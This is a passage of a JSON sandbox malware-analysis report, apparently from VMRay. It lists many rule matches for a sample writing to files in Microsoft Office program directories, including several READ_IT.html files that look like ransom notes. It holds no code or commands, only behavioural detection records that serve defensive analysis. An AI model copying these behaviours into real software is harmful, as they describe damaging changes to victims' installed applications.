"ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25695", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25702", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25709", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\Built-In Building Blocks.dotx", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\built-in building blocks.dotx", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25716", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\built-in building blocks.dotx\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26232", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\act3.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26235", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\act3.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26251", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26254", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26263", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26272", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\desksam.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26281", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\odbc.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\ol.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26294", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\ol.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26303", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\oladd.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26326", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\olappt.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26347", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26362", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\olmail.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\olnote.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26375", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\olnote.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26388", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\oltask.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\org97.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26409", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\org97.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\pab.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26422", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\pab.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26437", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26443", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26446", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26454", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26461", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26468", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26475", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26482", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26489", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26496", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26503", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26510", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26517", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": 